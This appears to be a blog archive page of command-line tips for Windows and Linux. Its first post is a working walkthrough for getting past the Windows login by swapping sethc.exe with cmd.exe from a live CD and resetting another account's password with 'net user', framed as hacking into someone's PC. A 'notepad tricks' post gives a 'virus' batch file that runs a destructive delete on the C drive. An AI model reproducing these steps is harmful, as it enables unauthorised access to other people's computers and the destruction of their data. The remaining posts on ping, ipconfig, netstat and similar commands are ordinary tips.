ads

Showing posts with label Cmd. Show all posts
Showing posts with label Cmd. Show all posts

Friday, 4 March 2016

Hack Windows 10 Login Password In few seconds

 computer technology

Forgot Windows Administrator Password? The first thing a normal user tries to do is take the PC to service center and do a  fresh re-installation of windows. In that case one may lose all the data,not to mention the service charges.  In another scenario,suppose if you want to hack into someone's PC there are a few methods to follow,like using Hiren CD,Trinity Rescue Kit,OphCrack etc. It takes considerable amount of time and computer skills and also these methods are not always successful. In such cases the below given method comes in handy.


Reset Windows 10 [Including Windows 8.1,8,7,Vista and XP] Password Without Knowing The Current Password. 


This is an old method,and it is based on a windows feature [Sticky Keys] found in all versions from the Old Windows XP to the latest Windows 10. Well it is a bit surprising to know that this classic windows backdoor works even in the latest Windows 10 !

Okey,So follow the below steps to Hack Windows 10.

Things you need-


1) Any Linux live CD(like Ubundu CD)/USB. If you don't have one download any Linux distribution ISO file and Make a bootable CD/USB. For simplicity sake I suggest Puppy Linux (lightest Linux distro,less than 200mb).

2)Basic knowledge in dealing with cmd,boot menu etc.

So let's get started.


1)Insert the live CD/Usb and boot from it. [You may need to Turn off Secure Boot feature for UEFI BIOS]

2)Locate the drive where Windows is installed.(C drive) Goto Windows/system32 folder.

3)Find out a file named 'cmd.exe' and rename it to 'cmd0.exe'

4)Next find another file by the name 'sethc.exe' [It is the program for windows sticky keys] Rename sethc.exe to cmd.exe.

5)Finally rename cmd0.exe to sethc.exe. [Swapping the sticky keys program with Command Promt (cmd). So whenever Sticky Keys program is called it runs cmd and vice versa. ]

5)Great! Now Shutdown and boot into Windows.

6)Press shift key five or six times at the login screen.

7)Now the command prompt will open up. Type this without quotes and hit enter.
"net user"
 computer technology

 8) Now you can see the list of active accounts [User Names] in the PC. Make a note of the Account Name you need to hack.

9) type the following command and hit enter.
"net user <space><Account Name><space> *"
 computer technology

 Note  <space>: leave space

          <Account Name> Replace it with the account you need to hack. In this example 'Mathews'

8)It will display 'enter new password'. Enter any new password and confirm. To remove password leave it blank.
 computer technology

Done! You can login with the new password now.
Read More »

Tuesday, 16 February 2016

10 Useful CMD Commands which You Should Know

CMD Commands

+ There are many useful cmd commands which works in every version of Windows including Windows 7, Windows 8, Windows 10, Windows XP , Vista etc. So, We will not only share cmd commands but will elaborate each of them as well. So folks, just tight your belts and get ready to learn about useful cmd commands. Recently, We have shared about how to fix this copy of windows is not genuine.
As we smobnology  always target beginners, so first of all we will discuss how you can open command prompt to run these cmd commands. After that, we will discuss function and How to use each cmd command and what is its function basically.
cmd commands

How to open Command Prompt to enter commands:

  1. First of all, open RUN by pressing Windows button + R or from start menu.
  2. Enter CMD.exe and press Enter or Click on OK.
  3. So, you are ready to try each and every cmd command now.

1) IPCONFIG – Basic CMD Command:

Using IPCONFIG cmd command you can quickly find your ip address. Though, you can find your IP address from control panel as well but it requires lot of clicks and will take some time. So, using IPCONFIG command of cmd, you can quickly check your IP address. So, to use this command, simply Enter IPCONFIG into the Command Prompt & it will quickly show you your ip address.
ipconfig cmd command

Also check: computer technology

2) PING – Check whether your internet is working fine or not:

PING command can quickly check whether your internet connection is working or not. If, we talk in technical terms, then it will quickly check whether your PC is sending/receiving packet or not. So, if result IP of any domain works, then it is working perfectly. So, to use this cmd command, simply enter PING google.com or any other domain. So, if IP of site comes as result, then your internet connection is working perfectly and if no result comes or if you get any kind of error, then something is blocking your internet connection. You may also like to read cmd.
ping cmd command

3) SHUTDOWN – Useful Command for Windows 8:

This command is exclusively useful for Windows 8 users to create shutdown shortcut icon, so that they can quickly shut down their pc with ease. As, Windows 8 users have to open tiles first and then they can turn off their pc only. So, this command is easy and time saving for Windows 8 users. Though, this command will work on every version of windows but in older version of windows, there is no need to create shortcuts. So, below We are sharing steps to use this cmd command. Also see: cmd.
  • Press Right Click of your Mouse button and Click on Create Shortcut.
  • Now, use these commands to create shortcuts of your choice:
  1. Shut Down: shutdown /s /t 0
  2. Restart: shutdown /r /t 0shutdown cmd command
  • Now, Simply click on OK and use these shortcut buttons to shutdown or restart your computer.


4) CIPHER – Overwrite or Delete any directory permanently:

This command is much helpful to you, if you are having old HDD in your PC or laptop. This command basically wipe your whole drive completely without any kind of issue. So, it does not require any other software to overwrite or delete any directory completely. Though, if you are having SSD, then there is no need of using this command. So, to use this command simply enter cipher /w:c command into Command prompt and press enter. It will wipe whole drive by writing random data. Also check out Windows 10.
cipher cmd command

5) NETSTAT – Check open protocols using Cmd Command:

netstat is very useful command to find open protocols of your network operator. This command can be useful to check trojan. It will also provide you list of related ip address as well. To use this command, simply enter netstat -an in Command Prompt and press enter.
netstat cmd command

You may like to read: internet internet tricks

6) RECIMG – Create custom recovery images

It is one of hidden feature of creating custom recovery images. Using this command,you can create your custom recovery images. Using this feature, you can remove default bloatware and also enables you to add your favourite third party programs to recovery images to your PC easily.
recimg cmd command

7) sfc /scannow – CMD Commands

Let me tell you one thing today that Windows has its secret scanner which scans system files for problems. So, if your OS is corrupted or any file is missing of your Windows. It will fix any virus which is creating issues in Windows. So to run this command, you need to open Command Prompt in administrator mode. After that Simply, enter this command sfc /scannow and press enter.
sfc scannow cmd command

8) wbadmin start backup – Useful CMD Commands

Using this cmd command, you can easily create system backup images without any kind of issue. You can create backup of each and every file of your Windows and other files.As,backup feature is removed in Windows 8.1, so you can create system backup using this command easily in Windows 8.1. This command can be run from Powershell easily. Also check out command line .
wbadmin cmd command

9) ASSOC

Are you facing problems in extensions and default programs which are set by windows to open that file extension. To overcome this problem, ASSOC comes handy. Using this cmd command, you can check out all extensions and can change it as well. For example: assoc .mp3=PROGRAM_NAME, using this command you can change it your wish to save your time in future. Though, you do it by doing right click on File name and then by going into properties, you can easily change it. But for computer geek, using such tasks using commands is totally fun.


10) Driverquery

Driverquery is one of useful cmd command which you must try out. As, you guys know driver plays important role in your Operating system functionality. So, using this useful cmd command you cam manage your all driver tasks using this useful cmd command. Moreover, using this cmd command you can find out location of any driver at which it is installed.
Read More »

Friday, 11 September 2015

Top 5 Cool Notepad Tricks

notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch file programs. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick

The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

3. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led


keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.






source:coolhackingtrick
Read More »

Tuesday, 8 September 2015

Introduction To Basic Terminal Commands For Linux

linux terminal
In this tutorial you will learn to use linux terminal. You will learn to navigate on the terminal, learn to create and remove file and much more. Most of this commands also works on Mac Os X and powershell on windows.

What Is Terminal ?

Basically you are reading this tutorial because you are new to linux or want to learn using terminal to navigate. Before you get started you must have linux installed or running virtually on your computer. I would recommend downloading fedora or ubuntu (If you have trouble installing ubuntu leave a comment below and i will post a tutorial).

Commands To Remember

This are some of commands you must remember which will help you to use terminal more easily.
ls - it will list all files and folder in your current directory
ls -l it will give detailt listing of all files and folders
ls -a it will list all files and folder in your current directory including hidden files (files and folders that begin with period)
pwd will print your working directory or simply your current directory

Navigating In Terminal

Here i may refer folder as directory so dont get confused. This is the term we use in linux for folders.

cd - cd stands for change directory. we use cd follow by path address to navigate ro that folder.
Eg: cd Desktop will make desktop as my current directory.
cd / will make root as you current directory
cd ~ will make home as your current directory
Typing cd alone is same as cd ~ and it will make home as your current directory
cd .. will make parent directory i.e directory above your current directory
cd ../../ will take you two folder up

Creating Files And Folder

mkdir - we use mkdir follow by path or folder name to create a directory
Eg mkdir car will create directory car in your current directory
to create folder recursively i.e folder inside folder inside folder we use -p flag
Eg mkdir -p vehicles/car/truck will create directory vehicles in your current directory which have car inside it and car has directory truck in it.

touch - we use touch follow by file name to create empty file.

Removing Files And Folders

rmdir - we use rmdir follow by path to to remove any directory. This will not work if folder you are trying to remove has something in it.
rm -r  to remove file recursively which can not be removed by rmdir
rm - We use this command to remove files
Read More »

Finding Ip Address Of A Website Using Command Prompt Or CMD

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
finding ip adddress of website
3. It will take less then a second and come up with the results as shown below.
finding ip adddress of website








source:coolhackingtrick
Read More »

Tuesday, 25 August 2015

Know if someone is hacking your computer/ Trace a Hacker


Command Prompt hacks
Want to know if someone is hacking your computer? Command Prompt can help you find if someone you don't know is connected to your computer stealing private data. Just type  "netstat -a" and the command prompt will return a list of computers that your computer is connected to. In the results returned, Proto column gives the type of data transmission taking place (TCP or UDP) , Local address column gives the port with which your computer is connected to an external computer and the Foreign Address column gives the external computer you are connected to along with the port being used for the connection. State gives the state of the connection (whether a connection is actually established, or waiting for transmission or is “Timed Out”).
Read More »

Monday, 24 August 2015

The most important CMD console commands you should know



The most important CMD console commands you should know
Even though there are many who don't know about it, and even more who don't actually use it, the command-line console embedded in every Windows version (since Windows NT) is one of the most useful tools that your operating system provides. Known as CMD, or Command Prompt, this command-line interpreter is analog to UNIX shells and allows you to input a set of commands which you can't issue from anywhere else. To launch this console, all you have to do is press Win and R buttons on your keyboard, type "cmd" (without the quotes) and then press Enter.
Here is a list with some of the Command Prompt commands which I found to be either highly useful or very interesting. There's also a third category called "Redundant" which contains console commands that have easier alternatives, but are still worth mentioning.

Very Useful

Ping

PingPing
Out of all the available commands, Ping is the one I use the most. This instruction allows you to send a data package to a specified URL or IP address and check how long it takes for it to return to your PC. In simpler terms, this command will help you find out if you have a working connection with a website or another computer on your network and also find out how well that connection is working. Here are two examples of how to use it: "ping 196.168.1.1" (for an IP address) or "ping -t www.google.com" (for a website; -t means that this command will not stop automatically and will require you to manually turn it off).
Additionally there are two more closely related commands which could help you out in case something seems to be wrong. If a ping doesn't return and you want to figure out what is the problem, you can find out where it stops by using the Pathping. This command will show you every hop through which the packet is bounced until it reaches its final destination, thus enabling you to see exactly where the connection breaks. (Example: "pathping www.google.com".) In case you want to find out which of the hops is particularly slow you can use Tracert. This command works the same as Pathping, but also displays the time it takes for the package to arrive to each of the hops on the way. (Example: "tracert www.yahoo.com".)

Ipconfig

IpconfigIpconfig
Ipconfig is a command you will often use to quickly get information related to your network / internet connection and the hardware which makes it possible. If you type ipconfig /all into the console and press Enter, you will see a comprehensive list of data including your MAC address, your IP address, the server's IP address, the DNS server address, the Subnet mask, etc. Furthermore, in case if you get a warning message saying that there's an IP conflict on the network, you can type ipconfig /release (then press Enter) followed by ipconfig /renew to force the operating system to give you a new IP address. Lastly, you can use ipconfig /flushdns to refresh the DNS address, but you will rarely need this.

Interesting

Cipher

CipherCipher
If you didn't already know, when you ask Windows to delete a file or a folder, the operating system doesn't actually erase the data but instead marks it as inaccessible, and the space it occupies will be seen as free. However, until the respective disk sector (where the file is) gets overwritten, the data is still recoverable. Cipher is a really cool command which instructs your PC to overwrite all the deleted files from a specified location (drive or folder), thus making them harder to retrieve. Here's an example of how to use it: "cipher /w:c" (this will overwrite all the deleted files from your C partition). And you don't need to worry, this command only overwrites the files marked as deleted, leaving all the other files on your PC just as they are.

Netstat

NetstatNetstat
In case if you suspect you've been infected with some kind of Trojan, or if you think that someone else is also connected to your PC you can check things out by using Netstat. This command displays your current IP along with a list of all your opened ports and related IP addresses, Moreover, the console will tell you if each of the listed ports are listening, established or closed. (This time we don't need an example; simply type the command into the Command Prompt window and press Enter.)

System File Checker

SfcSfc
To be totally honest, I've never actually tested this command, as I reinstall my operating system quite often, but this doesn't mean that you may not need it. System File Checker (sfc) is a command which instructs your Windows to check and repair the system files. In order to use this instruction you will need to give the Command Prompt console administrator privileges, but the function is quite useful, as it attempts to automatically replace missing system files and repair those that are corrupted. To use this command type "sfc /scannow" into the CMD console and press Enter.

Assoc

AssocAssoc
Assoc is a very simple yet handy command which gives you detailed information about all the current associations between file types and the applications on your PC. In simple terms, you can easily find out which application is set to automatically open each extension using this instruction. If you type "assoc" into the console and then press Enter, you will see a list with every extension along with the program designated to deal with it, while if you type "assoc .doc=" you will see which of your applications opens your .DOC documents. (The second example works with any of the extensions you saw in the complete list.)

Powercfg

PowercfgPowercfg
In case if you didn't figure it from its name, Powercfg is a command which gives you information and helps you manage your computer's power-related settings. For example, typing "powercfg /a" in the CMD console and pressing Enter will display all the power-saving options that are currently available to you. As I said, you can also manage these setting: "powercfg /sleep off" will disable the sleep command for your PC. Additionally you can use "powercfg /devicequery s1_supported", which will display a list with all the devices on your network that support connected standby (meaning that they can remotely put your computer to sleep or wake it). Lastly, "powercfg /lastwake" will show you which connected device woke up your PC the most recently.

Redundant

Shutdown

ShutdownShutdown
In Windows 8 and Windows 8.1, the Command Prompt console can also be used to shut down your PC. I know that there are easier ways to do this, but if your type "shutdown" into the console your computer will be shutdown. However, when used with additional parameters, this command can actually be useful. For example, typing "shutdown /r /o" and pressing Enter will instruct your PC to restart and automatically open the Advanced Options Start Menu on startup (it's the place where you can choose to start your Windows in Safe Mode).

Tasklist

TasklistTasklist
Last on our list is the Tasklist command, which acts pretty much just like the task manager, displaying all the processes that are currently running on your Windows. (Just type "tasklist" in the console and press Enter.) The list contains the name, PID, Session Name, Session Number and Memory Usage of each entry on the list. If you were wondering why the PID is useful, I'll tell you. You can type "taskkill -PID <ID number>" and terminate the respective process. (For example, if you take a look at the image to the right, if I typed killtask -PID 508 the console would terminate the Winlogon process.
Read More »

Thursday, 13 August 2015

How to Enable Copy Paste in CMD

Step 1: Open CMD, Just type CMD in search or Press Win + X key to select Command Prompt.
Step 2: Right Click on the Title of the CMD window and Select Properties just like its shown in the below Picture
Enable Copy paste in CMD
Step 3: You will see a Pop up Window coming up, Now on the Right hand side, Under Edit Options, Just Check Quick Edit Mode and click OK
Step 4: Everything is Done, Now just Copy any Text from Here or Anywhere else Using CTRL + C keys and just Right click using your mouse on CMD. You will see that the text is been pasted automatically in CMD. Please Understand that Using CTRL + C to Copy text is Important.
Likewise if you wish to Copy Text from CMD to paste elsewhere then Just Select the Text in CMD and Again just Right Click with the mouse. Your Text is Copied and ready to Paste it in any Document you want.
This Doesn’t Limit you to just Text you can even copy File or Folder path and paste it in CMD. Everything that you have to type manually can be copied from somewhere and pasted directly to CMD with this small Tweak
So this was just a small Tip I wanted to Share with my Readers so that you don’t have to Type any long Command in CMD which if typed incorrectly can cause errors. I hope this will help some Of you.
Read More »

Enter your email address:

Delivered by FeedBurner